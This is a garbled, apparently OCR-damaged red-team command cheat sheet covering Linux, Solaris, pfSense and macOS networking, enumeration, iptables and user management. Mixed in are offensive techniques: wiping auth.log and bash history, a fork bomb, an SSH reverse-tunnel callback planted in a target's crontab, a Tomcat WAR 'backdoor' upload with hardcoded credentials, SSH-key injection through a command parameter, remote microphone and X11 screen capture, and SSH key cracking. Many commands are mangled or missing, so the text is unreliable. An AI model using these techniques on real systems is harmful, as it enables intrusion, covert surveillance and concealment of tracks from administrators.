Network commands



watch ss -tp

Network communication

netstat -ant

tcp or udp communication -anu=udp

netstat -tulpn

Communication with PIDs

lsof -i

Established communication

smb:// ip /share

smb shared environment access

share user x.x.x.x c$

Mount the shared Windows environment

smbclient -0 user\ ip \ share

Connect to SMB

ifconfig eth# ip I cidr

Set IP and netmask

ifconfig eth0:1 ip I cidr

Virtual interface setting

route add default gw gw lp

Set GW

ifconfig eth# mtu [size]

Change the MTU size

export MAC=xx: XX: XX: XX: XX: XX

Change the MAC

ifconfig int hw ether MAC

Change the MAC

macchanger -m MAC int

Change Mac in Backtrack

iwlist int scan

Wi-Fi scanner

nc -lvvp port

Listening to a specific port

python3 -m http.server port

Create a web server

dig -x ip

Identifying the domains of an ip

host ip

Identifying the domains of an ip

host -t SRV _ service

Identification of domain SRV

dig @ ip domain -t AXrR

Identify DNS Zone Xfer

host -1 domain namesvr

Identify DNS Zone Xfer

ip xfrm state list

Show available VPN

ip addr add ip I cidr aev ethO

Add ‘hidden’ interface

/var/log/messages I grep DHCP

DHCP list

tcpkill host ip and port port

Blocking ip:port

echo “1” /proc/sys/net/ipv4/ip forward

Enable IP Forwarding

echo ‘‘nameserver x.x.x.x’’ /etc7resolv.conf

Add DNS server

showmount -e ip

Show mounted points

mkdir /site_backups; mount -t nfs ip:/ /site_backup

mount route shared by ip

system information



nbstate -A -ip

Get hostname for ip


Current username


Logged in user

who -a

User information

last -a

The last logged in user

ps -ef

Available system processes (or use top)

df -h

The amount of disk usage (or using free)

uname -a

Show the kernel version along with the processor structure


Mount the file system

getent passwd

Display the list of users


Add variable to PATH

kill pid

Kill process with pid

cat /etc/issue

Display operating system information

cat /etc/’release’

Display operating system version information

cat /proc/version

Display kernel version information

rpm –query -all

Installed packages (in Redhat)

rpm -ivh ‘ .rpm

Installing rpm packages (to remove -e=remove)

dpkg -get-selections

Installed packages (in Ubuntu)

dpkg -I ‘.deb

Install DEB packages (to remove -r=remove)


Installed packages (on Solaris)

which tscsh/csh/ksh/bash

Display the paths of executable files

chmod -so tcsh/csh/ksh

Disabling shell and also forcing to use bash

find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \;

Finding files with suid

find / -uid 0 -perm -4000 -type f 2>/dev/null

Finding files with suid

find / -writable ! -user whoami -type f ! -path “/proc/” ! -path “/sys/” -exec ls -al {} \; 2>/dev/null

Show writable files

Functional commands



python -c “import pty;pty.spawn(‘/bin/bash’)”

Shell interactive

wget http:// url -0 url.txt -o /dev/null

Get the address

rdesktop ip

Access to desktop ip

scp /tmp/file user@x.x.x.x:/tmp/file

Send file

scp user@ remoteip :/tmp/file /tmp/file

Get the file

useradd -m user

added by the user

passwd user

Change user password

rmuser unarne

Delete user

script -a outfile

Loose recording: Ctrl-D to stop

apropos subject

Related commands


History of user commands

! num

Executive lines in history id_rsa > ssh-key

Find the passphrase

john ssh-key

Find the passphrase

ssh -i id_rsa user@ip

Connect with key and passphrase

id -u

Get user id

cut -d: -f3 < <(getent group GROUPNAME)

Get group id

curl -G ‘’ –data-urlencode ‘cmd=echo ssh-rsa AA………..’

Sending information with the get method in curl

curl –user ‘tomcat:$3cureP4s5w0rd123!’ –upload-file exploit.war “


Create backdoor with lfi vulnerability in java

File commands

collection of lines


diff file file2

Compare two files

rm -rf dir

Forced deletion of folders nested

shred -f -u file

Rewrite or delete the file

touch -r ref file

Adapting timestamp related to ref_file

touch -t YYYYMMDDHHSS file

set file timestamp

sudo fdisk -1

List of connected drivers

mount /dev/sda# /mnt/usbkey

Mounting usb devices

md5sum -t file

md5 crisp accounting

echo -n "str" | md5sum

Generate md5 hash

shalsum file

The SHAl hash of the file

sort -u

Relating and displaying unique lines

grep -c ''str'' file

grep -Hnri word * | vim -

Search for the desired word in files along with the file name

grep -rial word

Files containing the desired word

tar cf file.tar files

Create .tar from files

tar xf file.tar

Extract .tar

tar czf file.tar.gz files

Create .tar.gz

tar xzf file.tar.gz

Extract .tar.gz

tar cjf file.tar.bz2 files

Create .tar.bz2

tar xjf file.tar.bz2

Extract .tar.bz2

gzip file

Compress and rename the file

gzip -d file. gz

Not compressing file.gz

upx -9 -o out.exe orig.exe

Get UPX packs related to orig.exe

zip -r \Directory\'

Create zip

dd skip=lOOO count=2000 bs=S if=file of=file

Separate 1 to 3 KB from the file

split -b 9K file prefix

Separation of 9 KB sections from the file

awk 'sub("$"."\r")' unix.txt win.txt

Windows compatible txt file

find -i -name file -type '.pdf

Search for PDF files

find I -perm -4000 -o -perm -2000 -exec ls -

ldb {} \;

Search setuid files

dos2unix file

Switch to *nix format

file file

Determine the file type and format

chattr (+/-)i file

setting or not setting the immutable bit

while [ $? -eq 0 ]; do cd flag/; done

Enter infinite nested folder

Miscellaneous commands




Disable reports in history

ssh user@ ip arecord - I aplay -

Remote microphone recording

gcc -o outfile myfile.c

Compile C, C++

init 6

Restart (0 = shutdown)

cat /etc/ 1 syslog 1 .conf 1 grep -v ‘’”#’’

list of report files

grep ‘href=’ file 1 cut -d”/” -f3 I grep url | sort -u

Separation of links

dd if=/dev/urandom of= file bs=3145728 count=100

Create a 3 MB file

Controller commands



echo “” /var/log/auth.log

Delete the auth.log file

echo ‘’’’ -/.bash history

Delete the session history of the current user

rm -/.bash history/ -rf

Delete the file .bash_history

history -c

Delete the session history of the current user


Setting the maximum lines of the history file to zero

export HISTSIZE=0

Setting the maximum number of commands in the history file to zero


delete history (need to log in again to apply)

kill -9 $$

Delete the current meeting

ln /dev/null -/.bash_historj -sf

Permanently send all history commands to /dev/null

File system structure




System binary files


Files related to the boot process


Interfaces related to system devices


System configuration files


A basic place for users and libraries


Essential software libraries


Executive and systemic processes


The base path for the root user


executable files of the root user


Temporary files


Not very necessary files


System variables file





Hash of local users


Local users


Local groups


Startup services




List of hostnames and IPs


Show hostname along with domain


Network communication


System environment variables


list of ubuntu distribution sources


namserver settings

/horne/ user /.bash history

bash history (also in /root/)


MAC Manufacturer


Location of ssh keystores


System reports file (for Linux)


System reports file (for Unix)


List of files in cron


Apache communication reports


Fixed system information file

Using powershell


sudo apt install gss-ntlmssp
sudo apt-get install powershell

Login using username and password

$offsec_session = New-PSSession -ComputerName -Authentication Negotiate -Credential k.svensson
Enter-PSSession $offsec_session
New-Item -ItemType Junction -Path 'C:\ProgramData' -Target 'C:\Users\Administrator'

Script writing

Create Ping sweep

for x in {1 .. 254 .. l};do ping -c 1 1.1.1.$x lgrep "64 b" lcut -d" "-f4 ips.txt; done

Automating the domain name resolve process in the bash script

echo "Enter Class C Range: i.e. 192.168.3"
read range
for ip in {1 .. 254 .. l}; do
host $range.$ip lgrep " name pointer " lcut -d"

Creating a Fork bomb (Creating a process to crash the system)

: (){:|: & };:

dns reverse lookup process

for ip in {1 .. 254 .. 1}; do dig -x 1.1.1.$ip | grep $ip
dns.txt; done

Do not block Ip script

# This script bans any IP in the /24 subnet for starting at 2
# It assumes 1 is the router and does not ban IPs .20, .21, .22
$i -le 253 l
if [ $i -ne 20 -a $i -ne 21 -a $i -ne 22 ]; then
echo "BANNED: arp -s 192.168.1.$i"
arp -s 192.168.1.$i OO:OO:OO:OO:OO:Oa
echo "IP NOT BANNED: 192.168.1.$i"
i='expr $i +1`

Create SSH Callback

Set up script in crontab to callback every X minutes.
Highly recommend YOU
set up a generic user on red team computer (with no shell privs).
will use the private key (located on callback source computer) to connect
to a public key (on red team computer). Red teamer connects to target via a
local SSH session (in the example below, use #ssh -p4040 localhost)
# Callback: script located on callback source computer (target)
killall ssh /dev/null 2 &1
sleep 5
    COUNT=S(ping -c2 $LIVEHOST | grep 'received' | awk -F','{ print $2 } '
    | awk ' ( print $1 | ')
    if [ [ $COUNT -gt 0 ] ] ; then
    ssh -R $(REMLIS}:localhost:22 -i
    "/home/$(REMUSR}/.ssh/id rsa" -N $(LIVEHOST} -1 $(REMUSR}

Iptables command

Use iptable for ipv6


iptables-save -c file

Extract iptable rules and save to file

iptables-restore file

retrieving iptables rules

iptables -L -v --line-numbers

List of all rules with their line number

iptables -F

Restart all rules



Policy change if rules are not met

iptables -A INPUT -i interface -m state --state RELATED,ESTABLcSHED -j ACCEPT

Allow connections made on INPUT

iptables -D INPUT 7

Remove 7 layers of inbound rules

iptables -t raw -L -n

Increase productivity by disabling statefulness

iptables -P INPUT DROP

Delete all packets

Allow ssh and port 22 in outbound

iptables -A OUTPUT -o iface -p tcp --dport 22 -m state --state
iptables -A INPUT -i
iface -p tcp --sport 22 -m state --state

Allow ICMP in outband

iptacles -A OUTPUT -i iface -p icmp --icmp-type echo-request -j ACCEPT
iptables -A INPUT -o iface -p icmp --icmp-type echo-reply -j ACCEPT

Create port forward

echo "1" /proc/sys/net/ipv4/lp forward
# OR- sysctl net.ipv4.ip forward=1
iptables -t nat -A PREROUTING -p tcp -i ethO -j DNAT -d pivotip --dport
443 -to-destination attk ip :443
iptables -t nat -A POSTROUTING -p tcp -i eth0 -j SNAT -s target subnet
cidr -d attackip --dport 443 -to-source pivotip
iptables -t filter -I FORWARD 1 -j ACCEPT

Allow and port 80,443 and create log in /var/log/messages

iptables -A INPU~ -s -m state --state RELATED,ESTABLISHED,NEW
-p tcp -m multipart --dports 80,443 -j ACCEPT
iptables -A INPUT -i ethO -m state --state RELATED,ESTABLISHED -j ACCEPT
iptables -P INPUT DROP
iptables -A OUTPUT -o ethO -j ACCEPT
iptables -A INPUT -i lo -j ACCEPT
iptables -A OUTPUT -o lo -j ACCEPT
iptables -N LOGGING
iptables -A INPUT -j LOGGING
iptables -A LOGGING -m limit --limit 4/min -j LOG --log-prefix "DROPPED "
iptables -A LOGGING -j DROP

Update-rc.d file

Check and create launcher


service --status-all

[+] Service starts at boot

[-] Service does not start

service service start

start service

service service stop

stop service

service service status

Check service status

update-rc.d -f service remove

Remove the existing system startup service (-f for the /etc/init.d file if it already exists)

update-rc.d service defaults

Added service in system startup


Available in red hat distributions such as centos and oracle



chkconfig –list

List of available services and implementation status

chkconfig service -list

The status of a service

chkconfig service on [–level 3]

Adding the service [Its layer can also be specified]

chkconfig service off [–level 3] e.g. chkconfig iptables off

Remove the service

Screen command



screen -S name

Create a new screen with the name

screen -ls

List of running screens

screen -r name

Addition to screen with the name

screen -S name -X cmd

Send command to screen with the name


List of key combinations (help)

C-a d

Addition removal

C-a D D

Removal of joining and leaving

C-a c

Create a new window

C-a C-a

Switch to the last window

C-a ‘num|name

Switch to the window named

C-a “

Show window list and changes

C-a k

Delete the current window

C-a S

Horizontal separation of the display

C-a V

Vertical separation of the display

C-a tab

Jump to the last screen

C-a X

Delete the current section

C-a Q

Delete all sections except the current section


Remote recording of X11 window and changing its format to JPG

xwd -display ip :0 -root -out /tmp/test.xpm
xwud -in /tmp/test1.xpm
convert /tmp/test.xpm -resize 1280x1024 /tmp/test.jpg

Open X11 in stream mode

xwd -display -root -silent -out x11dump
Read dumped file with xwudtopnm or GIMP

TCPDump command

Record packets in eth0 and change it from ASCII and hex and save it in the file

tcpdump -i ethO -XX -w out.pcap

Recording of all traffic

tcpdump -i ethO port 80 dst

Show all ip connections

tcpdump -i ethO -tttt dst and not net

Show all ping outputs

tcpdump -i ethO 'icmp[icmptype] == icmp-echoreply'

Record 50 dns packets and display timestamp

tcpdump -i ethO -c 50 -tttt 'udp and port 53'

Kali default commands

Equivalent to WMIC

wmis -U DOMAIN\ user % password //DC cmd.exe /c command

Mount SMB shared space

# Mounts to /mnt/share. For other options besides ntlmssp, man mount.cifs
mount.cifs // ip /share /mnt/share -o


apt-get update
apt-get upgrade

Checking the operating system for the possibility of upgrading access
Example: ./ -s -k keyword -r report -e /tmp/ -t

List of all processes with root access
For example: ./pspy64 -pf -i 1000

The PFSENSE command




Shell pfSense

pfSsh.php playback enableallowallwan

Allowing connections to inbound connections on the WAN (Adding hidden rules to WAN rules )

pfSsh.php playback enablesshd

Enable inbound/outbound ssh

pfctl -sn

Show NAT rules

pfctl -sr

Show filter rules

pfctl -sa

Show all rules


Edit settings

rm /tmp/config.cache

Target cache (or backup) settings after its execution


Reload the entire configuration

SOLARIS operating system



ifconfig -a

List of all interfaces

netstat -in

List of all interfaces

ifconfig -r

List of routes

ifconfig eth0 dhcp

Start DHCP in user

ifconfig eth0 plumb up ip netmask nmask

IP setting

route add default ip

Gateway setting

logins -p

List of users and passwords

svcs -a

List of all services along with status

prstat -a

Status of processes (also command top)

svcadm start ssh

Start the SSH service

inetadm -e telnet (-d for disable)

telnet activation

prtconf I grep Memorj

Total physical memory

iostat -En

Hard disk size

showrev -c /usr/bin/bash

Binary information

shutdown -i6 -g0 -y

Restart the system


List of users connected to NFS


GUI management

snoop -d int -c pkt # -o results.pcap

Packet recording


Mounted system file table


Reports list of login attempts


Default settings


Kernel modules and settings


syslog path

/etc/auto ‘

Automounter settings file


IPv4 and IPv6 hosts files

Important cache files




vim editor file


Situational Awareness




shows real-time system statistics including CPU usage, memory usage, and running processes.

ps aux

displays a list of running processes with their associated details.


displays active network connections, routing tables, and a number of network interface and protocol statistics.

shows all active network connections and which processes are using them.displays a list of running processes with their associated details.


allows the capture and analysis of network traffic.

tail -f /var/log/system.log

displays real-time updates to the macOS system log.

log show –predicate ‘process == “PROCESS_NAME”’ –info

displays system log entries for a specific process.


shows real-time file system activity, including which files are being accessed and by which processes.


displays a graphical representation of file system activity.


allows the tracing and analysis of system events.

launchctl list

displays a list of all currently loaded launch daemons and agents.

User Plist File Enumeration




The user plist file for the currently logged-in user can be found in here


Other user plist files can be found in here

defaults read <path_to_plist_file>

Read a plist file

defaults write <path_to_plist_file> <key> <value>

Write a plist file

defaults delete <path_to_plist_file> <key>

Delete a key from a plist file

PlistBuddy -c "Open <path_to_plist_file>"

Open a plist file

PlistBuddy -c "Print <key>" <path_to_plist_file>

Print a value from a plist file

PlistBuddy -c "Add <key> <type> <value>" <path_to_plist_file>

Add a new key-value pair to a plist file

PlistBuddy -c "Delete <key>" <path_to_plist_file>

Delete a key from a plist file

PlistBuddy -c "Set <key> <value>" <path_to_plist_file>

Set the value of a key in a plist file

plutil -lint <path_to_plist_file>

Validate a plist file

plutil -convert xml1 <path_to_plist_file>

Convert a plist file to XML format

User & Group



sudo dscl . -create /Users/newusername

create a new user

sudo dscl . -passwd /Users/newusername password

set the user’s password

sudo dscl . -append /Groups/admin GroupMembership newusername

make the user an administrator

sudo dseditgroup -o create -r "Group Name" groupname

create a new group

sudo dseditgroup -o edit -a username -t user groupname

add users to the group

dscl . -read /Groups/groupname GroupMembership

list the members of a group

sudo dseditgroup -o delete groupname

delete a group

sudo dseditgroup -o edit -d username -t user groupname

remove a user from a group

sudo dseditgroup -o edit -n newgroupname -r oldgroupname

rename a group

Last updated